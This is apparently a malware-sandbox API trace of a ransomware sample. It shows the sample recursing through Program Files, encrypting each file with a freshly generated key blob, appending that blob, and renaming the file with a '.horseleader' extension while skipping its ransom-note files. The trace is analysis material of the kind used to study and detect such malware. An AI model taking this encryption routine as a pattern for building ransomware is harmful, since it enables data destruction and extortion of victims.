GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=101248) returned 1 [0245.590] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.590] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.593] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.593] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.594] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x9dc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.594] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.595] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.595] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.595] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x13b80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.595] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.596] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.596] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.596] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.596] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.596] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.596] CloseHandle (hObject=0x158) returned 1 [0245.596] GetProcessHeap () returned 0x780000 [0245.596] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.597] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL.horseleader") returned 86 [0245.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\imcontact.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\imcontact.dll.horseleader")) returned 1 [0245.597] GetProcessHeap () returned 0x780000 [0245.597] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.598] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, 
ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f42f7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="LISTS", cAlternateFileName="")) returned 1 [0245.598] lstrcmpiW (lpString1="LISTS", lpString2="Windows") returned -1 [0245.598] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS") returned 66 [0245.598] lstrcmpW (lpString1="LISTS", lpString2=".") returned 1 [0245.598] lstrcmpW (lpString1="LISTS", lpString2="..") returned 1 [0245.598] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.598] GetProcessHeap () returned 0x780000 [0245.598] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.598] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\*") returned 68 [0245.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f42f7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x33bd0262, dwReserved1=0xcc71a064, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0245.599] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.599] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\Smart Tag\\LISTS\\.") returned 68 [0245.599] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.599] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f42f7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x33bd0262, dwReserved1=0xcc71a064, cFileName="..", cAlternateFileName="")) returned 1 [0245.599] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.599] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\..") returned 69 [0245.600] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.600] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.600] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef07e390, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x33bd0262, dwReserved1=0xcc71a064, cFileName="1033", cAlternateFileName="")) returned 1 [0245.600] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0245.600] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033") returned 71 [0245.600] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0245.600] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0245.600] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\Smart Tag\\LISTS\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.600] GetProcessHeap () returned 0x780000 [0245.600] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.600] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\*") returned 73 [0245.600] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef07e390, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0245.600] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.600] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\.") returned 73 [0245.600] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.600] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef07e390, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="..", cAlternateFileName="")) returned 1 [0245.601] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.601] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\..") returned 74 [0245.601] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.601] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.601] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x310fad00, ftCreationTime.dwHighDateTime=0x1c2d758, ftLastAccessTime.dwLowDateTime=0xeed123f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x310fad00, ftLastWriteTime.dwHighDateTime=0x1c2d758, nFileSizeHigh=0x0, nFileSizeLow=0x22d6, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="DATES.XML", cAlternateFileName="")) returned 1 [0245.601] lstrcmpiW (lpString1="DATES.XML", lpString2="Windows") returned -1 [0245.601] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 81 [0245.601] StrStrIW (lpFirst="DATES.XML", lpSrch=".horseleader") returned 0x0 [0245.601] lstrcmpW (lpString1="DATES.XML", lpString2="#Decrypt#.txt") returned 1 [0245.601] lstrcmpW (lpString1="DATES.XML", lpString2="_uninstalling_.png") returned 1 [0245.601] lstrlenW (lpString=".testttjffg") returned 11 [0245.601] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML", lpSrch=".testttjffg") returned 0x0 [0245.601] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0245.601] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0245.602] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program 
files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0245.602] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 81 [0245.602] StrStrW (lpFirst="DATES.XML", lpSrch=".txt") returned 0x0 [0245.602] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=8918) returned 1 [0245.602] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x22d6, lpOverlapped=0x0) returned 1 [0245.605] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffdd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.605] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x22d6, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x22d6, lpOverlapped=0x0) returned 1 [0245.605] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.605] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0245.605] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0245.605] CloseHandle (hObject=0x15c) returned 1 [0245.606] GetProcessHeap () returned 0x780000 [0245.606] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfe8 
[0245.606] wnsprintfW (in: pszDest=0x7dbfe8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.horseleader") returned 93 [0245.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.horseleader")) returned 1 [0245.607] GetProcessHeap () returned 0x780000 [0245.607] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfe8 | out: hHeap=0x780000) returned 1 [0245.607] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a301d00, ftCreationTime.dwHighDateTime=0x1c2d7fa, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x8a301d00, ftLastWriteTime.dwHighDateTime=0x1c2d7fa, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="PHONE.XML", cAlternateFileName="")) returned 1 [0245.607] lstrcmpiW (lpString1="PHONE.XML", lpString2="Windows") returned -1 [0245.607] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 81 [0245.607] StrStrIW (lpFirst="PHONE.XML", lpSrch=".horseleader") returned 0x0 [0245.607] lstrcmpW (lpString1="PHONE.XML", lpString2="#Decrypt#.txt") returned 1 [0245.607] lstrcmpW (lpString1="PHONE.XML", lpString2="_uninstalling_.png") returned 1 [0245.607] lstrlenW (lpString=".testttjffg") returned 11 [0245.607] StrStrW (lpFirst="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML", lpSrch=".testttjffg") returned 0x0 [0245.607] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0245.607] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0245.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0245.608] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 81 [0245.608] StrStrW (lpFirst="PHONE.XML", lpSrch=".txt") returned 0x0 [0245.608] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1844) returned 1 [0245.608] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x734, lpOverlapped=0x0) returned 1 [0245.610] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff8cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.610] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x734, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x734, lpOverlapped=0x0) returned 1 [0245.611] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.611] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0245.611] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0245.611] CloseHandle (hObject=0x15c) returned 1 [0245.611] GetProcessHeap () returned 0x780000 [0245.611] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfe8 [0245.611] wnsprintfW (in: pszDest=0x7dbfe8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.horseleader") returned 93 [0245.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.horseleader")) returned 1 [0245.614] GetProcessHeap () returned 0x780000 [0245.614] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfe8 | out: hHeap=0x780000) returned 1 [0245.614] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1271800, ftCreationTime.dwHighDateTime=0x1c4481e, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc1271800, ftLastWriteTime.dwHighDateTime=0x1c4481e, nFileSizeHigh=0x0, nFileSizeLow=0x9869, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="STOCKS.DAT", cAlternateFileName="")) returned 1 [0245.614] lstrcmpiW 
(lpString1="STOCKS.DAT", lpString2="Windows") returned -1 [0245.614] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 82 [0245.614] StrStrIW (lpFirst="STOCKS.DAT", lpSrch=".horseleader") returned 0x0 [0245.614] lstrcmpW (lpString1="STOCKS.DAT", lpString2="#Decrypt#.txt") returned 1 [0245.614] lstrcmpW (lpString1="STOCKS.DAT", lpString2="_uninstalling_.png") returned 1 [0245.614] lstrlenW (lpString=".testttjffg") returned 11 [0245.614] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT", lpSrch=".testttjffg") returned 0x0 [0245.614] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0245.615] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0245.615] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0245.615] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 82 [0245.615] StrStrW (lpFirst="STOCKS.DAT", lpSrch=".txt") returned 0x0 [0245.615] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=39017) returned 1 [0245.615] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0245.618] 
SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.618] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0245.619] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x4869, lpOverlapped=0x0) returned 1 [0245.620] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb797, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.620] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x4869, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x4869, lpOverlapped=0x0) returned 1 [0245.620] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.620] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0245.620] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0245.620] CloseHandle (hObject=0x15c) returned 1 [0245.620] GetProcessHeap () returned 0x780000 [0245.620] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfe8 [0245.620] wnsprintfW (in: pszDest=0x7dbfe8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart 
